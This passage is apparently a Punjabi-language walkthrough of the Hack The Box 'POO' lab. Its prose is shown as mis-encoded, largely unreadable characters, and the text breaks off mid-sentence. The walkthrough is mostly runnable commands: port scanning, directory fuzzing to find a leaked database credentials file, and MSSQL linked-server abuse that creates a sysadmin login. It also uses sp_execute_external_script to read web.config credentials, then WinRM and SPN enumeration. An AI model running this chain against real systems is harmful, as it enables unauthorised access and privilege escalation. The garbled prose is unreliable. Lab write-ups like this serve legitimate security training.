เจเจธ เจฒเฉเจ เจตเจฟเฉฑเจ, เจ
เจธเฉเจ เจธเจพเจเจ เจคเฉเจ เจธเจฟเจฐเจซเจผ เจเฉฑเจ เจฎเจธเจผเฉเจจ เจนเฉ เจจเจนเฉเจ, เจธเจเฉเจ เจเฉฑเจ เจชเฉเจฐเฉ เจฎเจฟเฉฐเจจเฉ-เจชเฉเจฐเจฏเฉเจเจธเจผเจพเจฒเจพ เจฆเฉ เจฌเฉเจคเจฃ เจฆเจพ เจตเจฟเจธเจผเจฒเฉเจธเจผเจฃ เจเจฐเจพเจเจเฉเฅค
เจเจฟเจตเฉเจ เจเจฟ เจตเจฐเจฃเจจ เจตเจฟเฉฑเจ เจฆเฉฑเจธเจฟเจ เจเจฟเจ เจนเฉ, POO เจจเฉเฉฐ เจเฉฑเจ เจเฉเจเฉ เจเจเจเจฟเจต เจกเจพเจเจฐเฉเจเจเจฐเฉ เจตเจพเจคเจพเจตเจฐเจจ เจตเจฟเฉฑเจ เจนเจฎเจฒเจฟเจเจ เจฆเฉ เจธเจพเจฐเฉ เจชเฉเจพเจตเจพเจ 'เจคเฉ เจนเฉเจจเจฐเจพเจ เจฆเฉ เจเจพเจเจ เจเจฐเจจ เจฒเจ เจคเจฟเจเจฐ เจเฉเจคเจพ เจเจฟเจ เจนเฉเฅค เจเฉเจเจพ เจเฉฑเจ เจเจชเจฒเจฌเจง เจนเฉเจธเจ เจจเจพเจฒ เจธเจฎเจเฉเจคเจพ เจเจฐเจจเจพ, เจตเจฟเจธเจผเฉเจธเจผ เจ เจงเจฟเจเจพเจฐเจพเจ เจจเฉเฉฐ เจตเจงเจพเจเจฃเจพ, เจ เจคเฉ เจ เฉฐเจค เจตเจฟเฉฑเจ เจชเฉเจฐเจเจฟเจฐเจฟเจ เจตเจฟเฉฑเจ 5 เจซเจฒเฉเจ เจเจเฉฑเจ เฉ เจเจฐเจเฉ เจชเฉเจฐเฉ เจกเฉเจฎเฉเจจ เจจเจพเจฒ เจธเจฎเจเฉเจคเจพ เจเจฐเจจเจพ เจนเฉเฅค
เจชเฉเจฐเจฏเฉเจเจธเจผเจพเจฒเจพ เจจเจพเจฒ เจเฉเจจเฉเจเจธเจผเจจ VPN เจฐเจพเจนเฉเจ เจนเฉเฅค เจเจน เจธเจฟเจซเจผเจพเจฐเจธเจผ เจเฉเจคเฉ เจเจพเจเจฆเฉ เจนเฉ เจเจฟ เจเฉฐเจฎ เจเจฐ เจฐเจนเฉ เจเฉฐเจชเจฟเจเจเจฐ เจเจพเจ เจเจฟเจธเฉ เจนเฉเจธเจ เจคเฉเจ เจเจฟเฉฑเจฅเฉ เจคเฉเจนเจพเจกเฉ เจฒเจ เจฎเจนเฉฑเจคเจตเจชเฉเจฐเจจ เจกเฉเจเจพ เจนเฉเจตเฉ, เจคเฉเจ เจเจจเฉเจเจ เจจเจพ เจเจฐเฉ, เจเจฟเจเจเจเจฟ เจคเฉเจธเฉเจ เจเจนเจจเจพเจ เจฒเฉเจเจพเจ เจฆเฉ เจจเจพเจฒ เจเฉฑเจ เจจเจฟเฉฑเจเฉ เจจเฉเฉฑเจเจตเจฐเจ เจตเจฟเฉฑเจ เจเจเจเจฆเฉ เจนเฉ เจเฉ เจเจพเจฃเจเจพเจฐเฉ เจธเฉเจฐเฉฑเจเจฟเจ เจฌเจพเจฐเฉ เจเฉเจ เจเจพเจฃเจฆเฉ เจนเจจ ๐
เจธเฉฐเจเจ เจจเจพเจคเจฎเจ เจเจพเจฃเจเจพเจฐเฉ
เจคเจพเจ เจเฉ เจคเฉเจธเฉเจ เจจเจตเฉเจ เจฒเฉเจเจพเจ, เจธเฉเจซเจเจตเฉเจ
เจฐ เจ
เจคเฉ เจนเฉเจฐ เจเจพเจฃเจเจพเจฐเฉ เจฌเจพเจฐเฉ เจชเจคเจพ เจฒเจเจพ เจธเจเฉ, เจฎเฉเจ เจฌเจฃเจพเจเจ เจนเฉ
เจธเจพเจฐเฉ เจเจพเจฃเจเจพเจฐเฉ เจเฉเจตเจฒ เจตเจฟเจฆเจฟเจ
เจ เจเจฆเฉเจธเจผเจพเจ เจฒเจ เจชเฉเจฐเจฆเจพเจจ เจเฉเจคเฉ เจเจพเจเจฆเฉ เจนเฉเฅค เจเจธ เจฆเจธเจคเจพเจตเฉเจเจผ เจฆเจพ เจฒเฉเจเจ เจเจธ เจฆเจธเจคเจพเจตเฉเจเจผ เจฆเจพ เจ
เจงเจฟเจเจจ เจเจฐเจจ เจฆเฉ เจจเจคเฉเจเฉ เจตเจเฉเจ เจชเฉเจฐเจพเจชเจค เจเฉเจคเฉ เจเจฟเจเจจ เจ
เจคเฉ เจคเจฐเฉเจเจฟเจเจ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจจ เจฆเฉ เจจเจคเฉเจเฉ เจตเจเฉเจ เจเจฟเจธเฉ เจจเฉเฉฐ เจนเฉเจ เจจเฉเจเจธเจพเจจ เจฒเจ เจเฉเจ เจเจผเจฟเฉฐเจฎเฉเจตเจพเจฐเฉ เจจเจนเฉเจ เจฒเฉเจเจฆเจพเฅค
intro
เจเจธ เจเจเจกเจเฉเจฎ เจตเจฟเฉฑเจ เจฆเฉ เจฎเจธเจผเฉเจจเจพเจ เจนเจจ เจ เจคเฉ เจเจธ เจตเจฟเฉฑเจ 5 เจเฉฐเจกเฉ เจนเจจเฅค
เจเจชเจฒเจฌเจง เจนเฉเจธเจ เจฆเจพ เจตเฉเจฐเจตเจพ เจ
เจคเฉ เจชเจคเจพ เจตเฉ เจฆเจฟเฉฑเจคเจพ เจเจฟเจ เจนเฉเฅค
เจเฉฑเจฒเฉเจ!
เจฐเฉเจเจจ เจซเจฒเฉเจ
เจเจธ เจฎเจธเจผเฉเจจ เจฆเจพ 10.13.38.11 เจฆเจพ IP เจชเจคเจพ เจนเฉ เจเฉ เจฎเฉเจ /etc/hosts เจตเจฟเฉฑเจ เจเฉเฉเจฆเจพ เจนเจพเจเฅค
10.13.38.11 poo.htb
เจชเจนเจฟเจฒเจพ เจเจฆเจฎ เจเจชเจจ เจชเฉเจฐเจเจพเจ เจจเฉเฉฐ เจธเจเฉเจจ เจเจฐเจจเจพ เจนเฉเฅค เจเจฟเจเจเจเจฟ nmap เจจเจพเจฒ เจธเจพเจฐเฉเจเจ เจชเฉเจฐเจเจพเจ เจจเฉเฉฐ เจธเจเฉเจจ เจเจฐเจจ เจตเจฟเฉฑเจ เจฒเฉฐเจฌเจพ เจธเจฎเจพเจ เจฒเฉฑเจเจฆเจพ เจนเฉ, เจฎเฉเจ เจเจธเจจเฉเฉฐ เจชเจนเจฟเจฒเจพเจ masscan เจจเจพเจฒ เจเจฐเจพเจเจเจพ. เจ เจธเฉเจ 0pps 'เจคเฉ tun500 เจเฉฐเจเจฐเจซเฉเจธ เจคเฉเจ เจธเจพเจฐเฉเจเจ TCP เจ เจคเฉ UDP เจชเฉเจฐเจเจพเจ เจจเฉเฉฐ เจธเจเฉเจจ เจเจฐเจฆเฉ เจนเจพเจเฅค
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
เจนเฉเจฃ, เจชเฉเจฐเจเจพเจ 'เจคเฉ เจเฉฑเจฒเจฃ เจตเจพเจฒเฉเจเจ เจธเฉเจตเจพเจตเจพเจ เจฌเจพเจฐเฉ เจตเจงเฉเจฐเฉ เจตเจฟเจธเจคเฉเจฐเจฟเจค เจเจพเจฃเจเจพเจฐเฉ เจชเฉเจฐเจพเจชเจค เจเจฐเจจ เจฒเจ, -A เจตเจฟเจเจฒเจช เจจเจพเจฒ เจเฉฑเจ เจธเจเฉเจจ เจเจฒเจพเจเฅค
nmap -A poo.htb -p80,1433
เจเจธ เจคเจฐเฉเจนเจพเจ, เจธเจพเจกเฉ เจเฉเจฒ IIS เจ
เจคเฉ MSSQL เจธเฉเจตเจพเจตเจพเจ เจนเจจเฅค เจเจธ เจธเจฅเจฟเจคเฉ เจตเจฟเฉฑเจ, เจ
เจธเฉเจ เจกเฉเจฎเฉเจจ เจ
เจคเฉ เจเฉฐเจชเจฟเจเจเจฐ เจฆเจพ เจ
เจธเจฒ DNS เจจเจพเจฎ เจฒเฉฑเจญเจพเจเจเฉเฅค เจตเฉเฉฑเจฌ เจธเจฐเจตเจฐ 'เจคเฉ, เจธเจพเจจเฉเฉฐ IIS เจนเฉเจฎ เจชเฉเจ เจฆเฉเจเจฐเจพ เจธเฉเจเจเจค เจเฉเจคเจพ เจเจพเจเจฆเจพ เจนเฉเฅค
เจเจฒเฉ เจกเจพเจเจฐเฉเจเจเจฐเฉเจเจ เจเฉฑเจคเฉ เจฆเฉเจนเจฐเจพเจเจเฅค เจฎเฉเจ เจเจธ เจฒเจ เจเฉเจฌเจธเจเจฐ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจฆเจพ เจนเจพเจ. เจชเฉเจฐเจพเจฎเฉเจเจฐเจพเจ เจตเจฟเฉฑเจ เจ
เจธเฉเจ เจธเจเฉเจฐเฉเจฎเจพเจ เจฆเฉ เจธเฉฐเจเจฟเจ 128 (-t), URL (-u), เจธเจผเจฌเจฆเจเฉเจธเจผ (-w) เจ
เจคเฉ เจเจเจธเจเฉเจเจธเจผเจจเจพเจ เจฆเฉ เจเจฟเจฃเจคเฉ เจจเฉเฉฐ เจจเจฟเจธเจผเจเจฟเจค เจเจฐเจฆเฉ เจนเจพเจ เจเฉ เจธเจพเจกเฉ เจฆเจฟเจฒเจเจธเจชเฉ (-x) เจนเจจเฅค
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
เจเจธ เจคเจฐเฉเจนเจพเจ, เจธเจพเจกเฉ เจเฉเจฒ /admin เจกเจพเจเจฐเฉเจเจเจฐเฉ เจฒเจ HTTP เจชเฉเจฐเจฎเจพเจฃเจฟเจเจคเจพ เจนเฉ, เจจเจพเจฒ เจนเฉ .DS_Store เจกเฉเจธเจเจเจพเจช เจธเฉเจตเจพ เจธเจเฉเจฐเฉเจ เจซเจพเจเจฒ เจเจชเจฒเจฌเจง เจนเฉเฅค .DS_Store เจเจน เจซเจพเจเจฒเจพเจ เจนเจจ เจเฉ เจเฉฑเจ เจซเฉเจฒเจกเจฐ เจฒเจ เจเจชเจญเฉเจเจคเจพ เจธเฉเจเจฟเฉฐเจเจพเจ เจจเฉเฉฐ เจธเจเฉเจฐ เจเจฐเจฆเฉเจเจ เจนเจจ, เจเจฟเจตเฉเจ เจเจฟ เจซเจพเจเจฒเจพเจ เจฆเฉ เจธเฉเจเฉ, เจเจเจเจจ เจเจฟเจเจพเจฃเจพ, เจเฉเจฃเฉ เจเจ เจชเจฟเจเฉเจเฉ เจเจฟเฉฑเจคเจฐเฅค เจ
เจเจฟเจนเฉ เจซเจพเจเจฒ เจตเฉเจฌ เจกเจฟเจตเฉเจฒเจชเจฐเจพเจ เจฆเฉ เจตเฉเจฌ เจธเจฐเจตเจฐ เจกเจพเจเจฐเฉเจเจเจฐเฉ เจตเจฟเฉฑเจ เจเจคเจฎ เจนเฉ เจธเจเจฆเฉ เจนเฉเฅค เจเจธ เจคเจฐเฉเจนเจพเจ, เจธเจพเจจเฉเฉฐ เจกเจพเจเจฐเฉเจเจเจฐเฉ เจฆเฉ เจธเจฎเฉฑเจเจฐเฉ เจฌเจพเจฐเฉ เจเจพเจฃเจเจพเจฐเฉ เจฎเจฟเจฒเจฆเฉ เจนเฉเฅค เจเจธ เจฆเฉ เจฒเจ เจคเฉเจธเฉเจ เจตเจฐเจค เจธเจเจฆเฉ เจนเฉ
python3 dsstore_crawler.py -i http://poo.htb/
เจธเจพเจจเฉเฉฐ เจกเจพเจเจฐเฉเจเจเจฐเฉ เจฆเฉ เจธเจฎเฉฑเจเจฐเฉ เจฎเจฟเจฒเจฆเฉ เจนเฉ. เจเฉฑเจฅเฉ เจธเจญ เจคเฉเจ เจฆเจฟเจฒเจเจธเจช เจเฉฑเจฒ เจนเฉ /dev เจกเจพเจเจฐเฉเจเจเจฐเฉ, เจเจฟเจธ เจคเฉเจ เจ
เจธเฉเจ เจธเจฐเฉเจค เจ
เจคเฉ db เจซเจพเจเจฒเจพเจ เจจเฉเฉฐ เจฆเฉ เจธเจผเจพเจเจพเจตเจพเจ เจตเจฟเฉฑเจ เจฆเฉเจ เจธเจเจฆเฉ เจนเจพเจเฅค เจชเจฐ เจ
เจธเฉเจ เจซเจพเจเจฒ เจ
เจคเฉ เจกเจพเจเจฐเฉเจเจเจฐเฉ เจจเจพเจฎเจพเจ เจฆเฉ เจชเจนเจฟเจฒเฉ 6 เจ
เฉฑเจเจฐเจพเจ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐ เจธเจเจฆเฉ เจนเจพเจ เจเฉเจเจฐ เจธเฉเจตเจพ IIS ShortName เจฒเจ เจเจฎเจเจผเฉเจฐ เจนเฉเฅค เจคเฉเจธเฉเจ เจตเจฐเจค เจเฉ เจเจธ เจเจฎเจเจผเฉเจฐเฉ เจฆเฉ เจเจพเจเจ เจเจฐ เจธเจเจฆเฉ เจนเฉ
เจ
เจคเฉ เจธเจพเจจเฉเฉฐ เจเฉฑเจ เจเฉเจเจธเจ เจซเจพเจเจฒ เจฎเจฟเจฒเจฆเฉ เจนเฉ เจเฉ "poo_co" เจจเจพเจฒ เจธเจผเฉเจฐเฉ เจนเฉเฉฐเจฆเฉ เจนเฉเฅค เจเจน เจจเจนเฉเจ เจเจพเจฃเจฆเจพ เจเจฟ เจ
เฉฑเจเฉ เจเฉ เจเจฐเจจเจพ เจนเฉ, เจฎเฉเจ เจธเจฟเจฐเจซเจผ เจกเจพเจเจฐเฉเจเจเจฐเฉเจเจ เจฆเฉ เจกเจฟเจเจธเจผเจจเจฐเฉ เจตเจฟเฉฑเจเฉเจ เจเจน เจธเจพเจฐเฉ เจธเจผเจฌเจฆ เจเฉเจฃเฉ เจนเจจ เจเฉ "co" เจจเจพเจฒ เจธเจผเฉเจฐเฉ เจนเฉเฉฐเจฆเฉ เจนเจจเฅค
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
เจ เจคเฉ wfuzz เจจเจพเจฒ เจฆเฉเจนเจฐเจพเจเฅค
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
เจ
เจคเฉ เจธเจนเฉ เจธเจผเจฌเจฆ เจฒเฉฑเจญเฉ! เจ
เจธเฉเจ เจเจธ เจซเจพเจเจฒ เจจเฉเฉฐ เจฆเฉเจเจฆเฉ เจนเจพเจ, เจชเฉเจฐเจฎเจพเจฃ เจชเฉฑเจคเจฐเจพเจ เจจเฉเฉฐ เจธเฉเจฐเฉฑเจเจฟเจ
เจค เจเจฐเจฆเฉ เจนเจพเจ (DBNAME เจชเฉเจฐเจพเจฎเฉเจเจฐ เจฆเฉเจเจฐเจพ เจจเจฟเจฐเจฃเจพ เจเจฐเจฆเฉ เจนเฉเจ, เจเจน MSSQL เจคเฉเจ เจนเจจ)เฅค
เจ
เจธเฉเจ เจเฉฐเจกเฉ เจจเฉเฉฐ เจธเฉเจเจชเจฆเฉ เจนเจพเจ, เจ
เจคเฉ เจ
เจธเฉเจ 20% เจ
เฉฑเจเฉ เจตเจงเจฆเฉ เจนเจพเจเฅค
เจนเจน เจเฉฐเจกเจพ
เจ เจธเฉเจ MSSQL เจจเจพเจฒ เจเฉเฉเจฆเฉ เจนเจพเจ, เจฎเฉเจ DBeaver เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจฆเจพ เจนเจพเจ.
เจธเจพเจจเฉเฉฐ เจเจธ เจกเฉเจเจพเจฌเฉเจธ เจตเจฟเฉฑเจ เจเฉเจ เจตเฉ เจฆเจฟเจฒเจเจธเจช เจจเจนเฉเจ เจฎเจฟเจฒเจฆเจพ, เจเจ เจเฉฑเจ SQL เจธเฉฐเจชเจพเจฆเจ เจฌเจฃเจพเจ เจ
เจคเฉ เจเจพเจเจ เจเจฐเฉเจ เจเจฟ เจเจชเจญเฉเจเจคเจพ เจเฉ เจนเจจเฅค
SELECT name FROM master..syslogins;
เจธเจพเจกเฉ เจเฉเจฒ เจฆเฉ เจเจชเจญเฉเจเจคเจพ เจนเจจเฅค เจเจ เจเจชเจฃเฉ เจตเจฟเจธเจผเฉเจธเจผ เจ
เจงเจฟเจเจพเจฐเจพเจ เจฆเฉ เจเจพเจเจ เจเจฐเฉเจเฅค
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
เจเจธ เจคเจฐเฉเจนเจพเจ, เจเฉเจ เจตเจฟเจธเจผเฉเจธเจผ เจ
เจงเจฟเจเจพเจฐ เจจเจนเฉเจ เจนเจจ. เจเจ เจฒเจฟเฉฐเจ เจเฉเจคเฉ เจธเจฐเจตเจฐเจพเจ เจจเฉเฉฐ เจตเฉเจเฉเจ, เจฎเฉเจ เจเจธ เจคเจเจจเฉเจ เจฌเจพเจฐเฉ เจตเจฟเจธเจฅเจพเจฐ เจตเจฟเฉฑเจ เจฒเจฟเจเจฟเจ เจนเฉ
SELECT * FROM master..sysservers;
เจเจธ เจฒเจ เจ
เจธเฉเจ เจเฉฑเจ เจนเฉเจฐ SQL เจธเจฐเจตเจฐ เจฒเฉฑเจญเจฆเฉ เจนเจพเจ. เจเจฒเฉ openquery() เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจเฉ เจเจธ เจธเจฐเจตเจฐ เจเฉฑเจคเฉ เจเจฎเจพเจเจกเจพเจ เจฆเฉ เจเจเจเจผเฉเจเจฟเจเจธเจผเจจ เจฆเฉ เจเจพเจเจ เจเจฐเฉเจเฅค
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
เจ
เจคเฉ เจ
เจธเฉเจ เจเฉฑเจ เจธเจตเจพเจฒ เจฆเจพ เจฐเฉเฉฑเจ เจตเฉ เจฌเจฃเจพ เจธเจเจฆเฉ เจนเจพเจเฅค
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
เจคเฉฑเจฅ เจเจน เจนเฉ เจเจฟ เจเจฆเฉเจ เจ เจธเฉเจ เจเฉฑเจ เจฒเจฟเฉฐเจ เจเฉเจคเฉ เจธเจฐเจตเจฐ เจจเฉเฉฐ เจฌเฉเจจเจคเฉ เจเจฐเจฆเฉ เจนเจพเจ, เจคเจพเจ เจฌเฉเจจเจคเฉ เจจเฉเฉฐ เจเจฟเจธเฉ เจนเฉเจฐ เจเจชเจญเฉเจเจคเจพ เจฆเฉ เจธเฉฐเจฆเจฐเจญ เจตเจฟเฉฑเจ เจเจฒเจพเจเจ เจเจพเจเจฆเจพ เจนเฉ! เจเจ เจฆเฉเจเฉเจ เจเจฟ เจ เจธเฉเจ เจฒเจฟเฉฐเจ เจเฉเจคเฉ เจธเจฐเจตเจฐ 'เจคเฉ เจเจฟเจนเฉเฉ เจเจชเจญเฉเจเจคเจพ เจธเฉฐเจฆเจฐเจญ เจจเฉเฉฐ เจเจฒเจพ เจฐเจนเฉ เจนเจพเจเฅค
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
เจ
เจคเฉ เจนเฉเจฃ เจเจ เจฆเฉเจเฉเจ เจเจฟ เจฒเจฟเฉฐเจ เจเฉเจคเฉ เจธเจฐเจตเจฐ เจคเฉเจ เจธเจพเจกเฉ เจฒเจ เจฌเฉเจจเจคเฉ เจจเฉเฉฐ เจเจฟเจธ เจธเฉฐเจฆเจฐเจญ เจตเจฟเฉฑเจ เจฒเจพเจเฉ เจเฉเจคเจพ เจเจพเจเจฆเจพ เจนเฉ!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
เจเจธ เจคเจฐเฉเจนเจพเจ, เจเจน เจเฉฑเจ DBO เจธเฉฐเจฆเจฐเจญ เจนเฉ เจเจฟเจธ เจตเจฟเฉฑเจ เจธเจพเจฐเฉ เจตเจฟเจธเจผเฉเจธเจผ เจ
เจงเจฟเจเจพเจฐ เจนเฉเจฃเฉ เจเจพเจนเฉเจฆเฉ เจนเจจเฅค เจเจ เจฒเจฟเฉฐเจ เจเฉเจคเฉ เจธเจฐเจตเจฐ เจคเฉเจ เจฌเฉเจจเจคเฉ เจฆเฉ เจฎเจพเจฎเจฒเฉ เจตเจฟเฉฑเจ เจตเจฟเจธเจผเฉเจธเจผ เจ
เจงเจฟเจเจพเจฐเจพเจ เจฆเฉ เจเจพเจเจ เจเจฐเฉเจเฅค
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
เจเจฟเจตเฉเจ เจเจฟ เจคเฉเจธเฉเจ เจฆเฉเจ เจธเจเจฆเฉ เจนเฉ, เจธเจพเจกเฉ เจเฉเจฒ เจธเจพเจฐเฉ เจตเจฟเจธเจผเฉเจธเจผ เจ
เจงเจฟเจเจพเจฐ เจนเจจ! เจเจ เจเจชเจฃเจพ เจเจกเจฎเจฟเจจ เจเจธ เจคเจฐเฉเจนเจพเจ เจฌเจฃเจพเจเจเฅค เจชเจฐ เจเจน เจเจนเจจเจพเจ เจจเฉเฉฐ เจเจชเจจเจเจตเฉเจฐเฉ เจฆเฉเจเจฐเจพ เจจเจนเฉเจ เจนเฉเจฃ เจฆเจฟเฉฐเจฆเฉ, เจเจ เจเจธเจจเฉเฉฐ เจเจเจเจผเฉเจเจฟเจเจ เจเจเฉ เจฆเฉเจเจฐเจพ เจเจฐเฉเจเฅค
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
เจ เจคเฉ เจนเฉเจฃ เจ เจธเฉเจ เจจเจตเฉเจ เจเจชเจญเฉเจเจคเจพ เจฆเฉ เจชเฉเจฐเจฎเจพเจฃ เจชเฉฑเจคเจฐเจพเจ เจจเจพเจฒ เจเฉเฉเจฆเฉ เจนเจพเจ, เจจเจตเฉเจ เจซเจฒเฉเจ เจกเฉเจเจพเจฌเฉเจธ เจฆเฉ เจชเจพเจฒเจฃเจพ เจเจฐเจฆเฉ เจนเจพเจ.
เจ
เจธเฉเจ เจเจธ เจเฉฐเจกเฉ เจจเฉเฉฐ เจธเฉเจเจช เจเฉ เจ
เฉฑเจเฉ เจตเจงเจฆเฉ เจนเจพเจเฅค
เจชเจฟเฉฑเจเฉ เจฆเจพ เจเฉฐเจกเจพ
เจเจฒเฉ MSSQL เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจเฉ เจธเจผเฉเฉฑเจฒ เจชเฉเจฐเจพเจชเจค เจเจฐเฉเจ, เจฎเฉเจ เจเฉฐเจชเฉเจเฉเจ เจชเฉเจเฉเจ เจคเฉเจ mssqlclient เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐ เจฐเจฟเจนเจพ เจนเจพเจ.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
เจธเจพเจจเฉเฉฐ เจชเจพเจธเจตเจฐเจก เจชเฉเจฐเจพเจชเจค เจเจฐเจจ เจฆเฉ เจฒเฉเฉ เจนเฉ, เจ
เจคเฉ เจชเจนเจฟเจฒเฉ เจเฉเจเจผ เจเฉ เจ
เจธเฉเจ เจชเจนเจฟเจฒเจพเจ เจนเฉ เจฎเจฟเจฒ เจเฉเฉฑเจเฉ เจนเจพเจ เจเจน เจนเฉ เจธเจพเจเจ. เจเจธ เจคเจฐเฉเจนเจพเจ, เจธเจพเจจเฉเฉฐ เจเฉฑเจ เจตเฉเจฌ เจธเจฐเจตเจฐ เจธเฉฐเจฐเจเจจเจพ เจฆเฉ เจฒเฉเฉ เจนเฉ (เจ
เจธเฉเจ เจเฉฑเจ เจธเฉเจตเจฟเจงเจพเจเจจเจ เจธเจผเฉเฉฑเจฒ เจจเจนเฉเจ เจธเฉเฉฑเจ เจธเจเจฆเฉ, เจเจผเจพเจนเจฐ เจนเฉ เจเจฟ เจซเจพเจเจฐเจตเจพเจฒ เจเฉฐเจฎ เจเจฐ เจฐเจฟเจนเจพ เจนเฉ)เฅค
เจชเจฐ เจชเจนเฉเฉฐเจ เจคเฉเจ เจเจจเจเจพเจฐ เจเจฐ เจฆเจฟเฉฑเจคเจพ เจเจฟเจ เจนเฉเฅค เจนเจพเจฒเจพเจเจเจฟ เจ
เจธเฉเจ MSSQL เจคเฉเจ เจซเจพเจเจฒ เจจเฉเฉฐ เจชเฉเฉเจน เจธเจเจฆเฉ เจนเจพเจ, เจธเจพเจจเฉเฉฐ เจธเจฟเจฐเจซ เจเจน เจเจพเจฃเจจ เจฆเฉ เจเจผเจฐเฉเจฐเจค เจนเฉ เจเจฟ เจเจฟเจนเฉเฉเจเจ เจชเฉเจฐเฉเจเจฐเจพเจฎเจฟเฉฐเจ เจญเจพเจธเจผเจพเจตเจพเจ เจเฉเจเจซเจฟเจเจฐ เจเฉเจคเฉเจเจ เจเจเจเจ เจนเจจเฅค เจ
เจคเฉ MSSQL เจกเจพเจเจฐเฉเจเจเจฐเฉ เจตเจฟเฉฑเจ เจธเจพเจจเฉเฉฐ เจชเจคเจพ เจเจฒเจฆเจพ เจนเฉ เจเจฟ เจชเจพเจเจฅเจจ เจนเฉเฅค
เจซเจฟเจฐ web.config เจซเจพเจเจฒ เจจเฉเฉฐ เจชเฉเฉเจนเจจ เจฒเจ เจเฉเจ เจธเจฎเฉฑเจธเจฟเจ เจจเจนเฉเจ เจนเฉ.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
เจฎเจฟเจฒเฉ เจชเฉเจฐเจฎเจพเจฃ เจชเฉฑเจคเจฐเจพเจ เจฆเฉ เจจเจพเจฒ, /admin 'เจคเฉ เจเจพเจ เจ
เจคเฉ เจเฉฐเจกเจพ เจเฉเฉฑเจเฉเฅค
เจชเฉเจฐ เจฐเฉฑเจเจฃ เจฆเจพ เจเฉฐเจกเจพ
เจตเจพเจธเจคเจต เจตเจฟเฉฑเจ, เจเฉฑเจ เจซเจพเจเจฐเจตเจพเจฒ เจฆเฉ เจตเจฐเจคเฉเจ เจเจฐเจจ เจตเจฟเฉฑเจ เจเฉเจ เจ เจธเฉเจตเจฟเจงเจพเจตเจพเจ เจนเจจ, เจชเจฐ เจจเฉเจเจตเจฐเจ เจธเฉเจเจฟเฉฐเจเจพเจ เจจเฉเฉฐ เจฆเฉเจเจฆเฉ เจนเฉเจ, เจ เจธเฉเจ เจฆเฉเจเจฟเจ เจนเฉ เจเจฟ IPv6 เจชเฉเจฐเฉเจเฉเจเฉเจฒ เจตเฉ เจตเจฐเจคเจฟเจ เจเจพเจเจฆเจพ เจนเฉ!
เจเจธ เจชเจคเฉ เจจเฉเฉฐ /etc/hosts เจตเจฟเฉฑเจ เจธเจผเจพเจฎเจฒ เจเจฐเฉเฅค
dead:babe::1001 poo6.htb
เจเจฒเฉ เจนเฉเจธเจ เจจเฉเฉฐ เจฆเฉเจฌเจพเจฐเจพ เจธเจเฉเจจ เจเจฐเฉเจ, เจชเจฐ เจเจธ เจตเจพเจฐ IPv6 เจเฉฑเจคเฉเฅค
เจ
เจคเฉ WinRM เจธเฉเจตเจพ IPv6 เจเฉฑเจคเฉ เจเจชเจฒเจฌเจง เจนเฉเฅค เจเจ เจฎเจฟเจฒเฉ เจชเฉเจฐเจฎเจพเจฃ เจชเฉฑเจคเจฐเจพเจ เจจเจพเจฒ เจเฉเฉเฉเจเฅค
เจกเฉเจธเจเจเฉเจช 'เจคเฉ เจเฉฑเจ เจเฉฐเจกเจพ เจนเฉ, เจเจธ เจจเฉเฉฐ เจซเฉเฉ.
P00 เจตเจพเจฒเจพ เจเฉฐเจกเจพ
เจฆเฉ เจจเจพเจฒ เจฎเฉเจเจผเจฌเจพเจจ 'เจคเฉ reconnaissance เจฌเจพเจ
เจฆ
setspn.exe -T intranet.poo -Q */*
เจเจฒเฉ เจเจฎเจพเจเจก เจจเฉเฉฐ MSSQL เจฐเจพเจนเฉเจ เจเจฒเจพเจเจเจฆเฉ เจนเจพเจเฅค
เจเจธ เจคเจฐเฉเจนเจพเจ, เจธเจพเจจเฉเฉฐ p00_hr เจ
